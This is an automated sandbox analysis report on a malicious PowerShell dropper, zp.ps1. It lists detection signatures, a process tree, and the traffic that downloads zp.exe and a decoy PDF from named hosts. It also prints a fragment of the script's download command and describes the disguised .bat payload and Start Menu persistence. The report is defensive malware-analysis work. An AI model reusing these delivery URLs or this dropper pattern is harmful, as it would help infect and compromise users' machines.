Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
zp.ps1

Overview

General Information

Sample Name:zp.ps1
Analysis ID:879709
MD5:58eb8c4f2d5988814a59fca04c5b0edd
SHA1:631eaba56247b369d4932a205ef7fa9da9350f3b
SHA256:e6268aa465a623be3d90f4bebd5719954a9bfb7bdbb2fdb06607221bb548521c
Tags:ps1www-dld-ae
Infos:

Detection

Score:60
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Powershell drops PE file
Drops PE files to the user root directory
Powershell creates an autostart link
Queries the volume information (name, serial number etc) of a device
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Creates files inside the system directory
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Stores files to the Windows start menu directory
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
Uses insecure TLS / SSL version for HTTPS connection
Contains long sleeps (>= 3 min)
Abnormal high CPU Usage
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops files with a non-matching file extension (content does not match file extension)
Drops PE files
Drops PE files to the user directory
Dropped file seen in connection with other malware
Creates a process in suspended mode (likely to inject code)
Contains functionality for read data from the clipboard

Classification

Process Tree

  • System is w10x64
  • powershell.exe (PID: 4792 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\zp.ps1 MD5: 95000560239032BC68B4C2FDFCDEF913)
    • conhost.exe (PID: 1584 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • iqb3.bat (PID: 3424 cmdline: "C:\Users\Public\iqb3.bat" MD5: 849ACB6881494898FF4A18A4A0FBDB43)
    • AcroRd32.exe (PID: 6748 cmdline: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\user\Desktop\List of required items and services.pdf MD5: B969CF0C7B2C443A99034881E8C8740A)
      • RdrCEF.exe (PID: 7024 cmdline: "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043 MD5: 9AEBA3BACD721484391D15478A4080C7)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

No Sigma rule has matched

Snort Signatures

No Snort rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Multi AV Scanner detection for submitted file
Source: zp.ps1Virustotal: Detection: 18%Perma Link
Source: unknownHTTPS traffic detected: 84.16.234.51:443 -> 192.168.2.6:49693 version: TLS 1.0
Source: C:\Users\Public\iqb3.batCode function: 2_2_00405FE2 FindFirstFileA,FindClose,2_2_00405FE2
Source: C:\Users\Public\iqb3.batCode function: 2_2_0040559E CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,2_2_0040559E
Source: C:\Users\Public\iqb3.batCode function: 2_2_00402645 FindFirstFileA,2_2_00402645
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: global trafficHTTP traffic detected: GET /zp/zp.exe HTTP/1.1Host: www.dld.aeConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /rh/List%20of%20required%20items%20and%20services.pdf HTTP/1.1Host: www.bluemaxxlaser.comConnection: Keep-Alive
Source: unknownHTTPS traffic detected: 84.16.234.51:443 -> 192.168.2.6:49693 version: TLS 1.0
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49693
Source: unknownNetwork traffic detected: HTTP traffic on port 49693 -> 443
Source: powershell.exe, 00000000.00000002.523613908.000002D25B28A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: powershell.exe, 00000000.00000002.621608396.000002D275760000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micrp
Source: text-x-generic-template.png.2.drString found in binary or memory: http://jimmac.musichall.czif
Source: iqb3.bat, iqb3.bat, 00000002.00000002.751821324.0000000000409000.00000004.00000001.01000000.0000000A.sdmp, iqb3.bat, 00000002.00000000.492453132.0000000000409000.00000008.00000001.01000000.0000000A.sdmp, iqb3.bat.0.drString found in binary or memory: http://nsis.sf.net/NSIS_Error
Source: iqb3.bat, 00000002.00000002.751821324.0000000000409000.00000004.00000001.01000000.0000000A.sdmp, iqb3.bat, 00000002.00000000.492453132.0000000000409000.00000008.00000001.01000000.0000000A.sdmp, iqb3.bat.0.drString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: powershell.exe, 00000000.00000002.614964683.000002D26D462000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.614964683.000002D26D31F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.530639507.000002D25D4B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000000.00000002.530639507.000002D25D4B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000000.00000002.530639507.000002D25D2B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000000.00000002.530639507.000002D25D4B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000000.00000002.530639507.000002D25E3DF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.530639507.000002D25E3CD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.bluemaxxlaser.com
Source: powershell.exe, 00000000.00000002.530639507.000002D25E3CD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.bluemaxxlaser.com/rh/List%20of%20required%20items%20and%20services.pdf
Source: powershell.exe, 00000000.00000002.530639507.000002D25E3CD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.bluemaxxlaser.comx
Source: powershell.exe, 00000000.00000002.530639507.000002D25D4B8000.00000004.00000800.00020000.00000000.sdmp, zp.ps1String found in binary or memory: http://www.bluiblmaxxlasiblr.com/rh/List%20of%20riblquiribld%20itiblms%20and%20siblrvicibls.pdf
Source: powershell.exe, 00000000.00000002.620400615.000002D275472000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.coP
Source: powershell.exe, 00000000.00000002.530639507.000002D25D4B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000000.00000002.530639507.000002D25D4B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000000.00000002.530639507.000002D25D4B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000000.00000002.530639507.000002D25D4B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000000.00000002.530639507.000002D25ED89000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
Source: powershell.exe, 00000000.00000002.614964683.000002D26D462000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.614964683.000002D26D31F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.530639507.000002D25D4B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000000.00000002.530639507.000002D25DCB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dld.ae
Source: powershell.exe, 00000000.00000002.530639507.000002D25DCB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dld.ae/zp/zp.exe
Source: unknownDNS traffic detected: queries for: www.dld.ae
Source: global trafficHTTP traffic detected: GET /zp/zp.exe HTTP/1.1Host: www.dld.aeConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /rh/List%20of%20required%20items%20and%20services.pdf HTTP/1.1Host: www.bluemaxxlaser.comConnection: Keep-Alive
Source: iqb3.bat, 00000002.00000002.751970846.000000000054A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
Source: C:\Users\Public\iqb3.batCode function: 2_2_00405107 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,FindCloseChangeNotification,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,2_2_00405107

System Summary

barindex
Powershell drops PE file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\iqb3.batJump to dropped file
Source: C:\Users\Public\iqb3.batCode function: 2_2_00403217 EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcmpiA,CreateDirectoryA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,2_2_00403217
Source: C:\Users\Public\iqb3.batFile created: C:\Windows\resources\0409Jump to behavior
Source: C:\Users\Public\iqb3.batCode function: 2_2_004049462_2_00404946
Source: C:\Users\Public\iqb3.batCode function: 2_2_004062B82_2_004062B8
Source: C:\Users\Public\iqb3.batProcess Stats: CPU usage > 98%
Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\nsaB4A6.tmp\System.dll 75ED40311875312617D6711BAED0BE29FCAEE71031CA27A8D308A72B15A51E49
Source: zp.ps1Virustotal: Detection: 18%
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\zp.ps1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\Public\iqb3.bat "C:\Users\Public\iqb3.bat"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\user\Desktop\List of required items and services.pdf
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\Public\iqb3.bat "C:\Users\Public\iqb3.bat" Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\user\Desktop\List of required items and services.pdfJump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\Public\iqb3.batKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\iqb3.batJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_44kl3ld2.v02.ps1Jump to behavior
Source: classification engineClassification label: mal60.winPS1@13/63@3/3
Source: C:\Users\Public\iqb3.batCode function: 2_2_00402036 CoCreateInstance,MultiByteToWideChar,2_2_00402036
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Users\Public\iqb3.batCode function: 2_2_0040440A GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,2_2_0040440A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dllJump to behavior
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1584:120:WilError_01
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
Source: C:\Users\Public\iqb3.batCode function: 2_2_10002D40 push eax; ret 2_2_10002D6E
Source: C:\Users\Public\iqb3.batCode function: 2_2_00406009 GetModuleHandleA,LoadLibraryA,GetProcAddress,2_2_00406009
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\iqb3.batJump to dropped file
Source: C:\Users\Public\iqb3.batFile created: C:\Users\user\AppData\Local\Temp\nsaB4A6.tmp\System.dllJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\iqb3.batJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\iqb3.batJump to dropped file

Boot Survival

barindex
Drops PE files to the user root directory
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\iqb3.batJump to dropped file
Powershell creates an autostart link
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: .lnk -Name));getit -fz ($fzf + 'List of required items and services.pdf') -oulv 'http://www.bluiblmaxxlasiblr.com/rh/List%20of%20riblquiribld%20itiblms%20and%20siblrvicibls.pdf';exit@{# Script module or binary module file associated with this manifest.ModuleToProcess = 'Pester.psm1'# Version number of this module.ModuleVersion = '3.4.0'# ID used to uniquely identify this moduleGUID = 'a699dea5-2c73-4616-a270-1f7abb777e71'# Author of this moduleAuthor = 'Pester Team'# Company or vendor of this moduleCompanyName = 'Pester'# Copyright statement for this moduleCopyright = 'Copyright (c) 2016 by Pester Team, licensed under Apache 2.0 License.'# Description of the functionality provided by this moduleDescription = 'Pester provides a framework for running BDD style Tests to execute and validate PowerShell commands inside of PowerShell and offers a powerful set of Mocking Functions that allow tests to mimic and mock the functionality of any command inside of a piece of powershell code being tested. Pester tests can execute any command or script that is accesible to a pester test file. This can include functions, Cmdlets, Modules and scripts. Pester can be run in ad hoc style in a console or it can be integrated into the Build scripts of a Continuous Integration system.'# Minimum version of the Windows PowerShell user required by this modulePowerShellVersion = '2.0'# Functions to export from this moduleFunctionsToExport = @( 'Describe', 'Context', 'It', 'Should', 'Mock', 'Assert-MockCalled', 'Assert-VerifiableMocks', 'New-Fixture', 'Get-TestDriveItem', 'Invoke-Pester', 'Setup', 'In', 'InModuleScope', 'Invoke-Mock', 'BeforeEach', 'AfterEach', 'BeforeAll', 'AfterAll' 'Get-MockDynamicParameters', 'Set-DynamicParameterVariables', 'Set-TestInconclusive', 'SafeGetCommand', 'New-PesterOption')# # Cmdlets to export from this module# CmdletsToExport = '*'# Variables to export from this moduleVariablesToExport = @( 'Path', 'TagFilter', 'ExcludeTagFilter', 'TestNameFilter', 'TestResult', 'CurrentContext', 'CurrentDescribe', 'CurrentTest', 'SessionState', 'CommandCoverage', 'BeforeEach', 'AfterEach', 'Strict')# # Aliases to export from this module# AliasesToExport = '*'# List of all modules packaged with this module# ModuleList = @()# List of all files packaged with this module# FileList = @()PrivateData = @{ # PSData is module packaging and gallery metadata embedded in PrivateData # It's for rebuilding PowerShellGet (and PoshCode) NuGet-style packages # We had to do this because it's the only place we're allowed to extend the manifest # https://connect.microsoft.com/PowerShell/feedback/details/421837 PSData = @{ # The primary categorization of this module (from the TechNet Gallery tech tree). Category = "Scripting Techniques" # Keyword tags to help users find this module via navigations and search. Tags = @('powers
Source: C:\Users\Public\iqb3.batFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\LangustJump to behavior
Source: C:\Users\Public\iqb3.batFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Langust\GradeJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\Public\iqb3.batProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
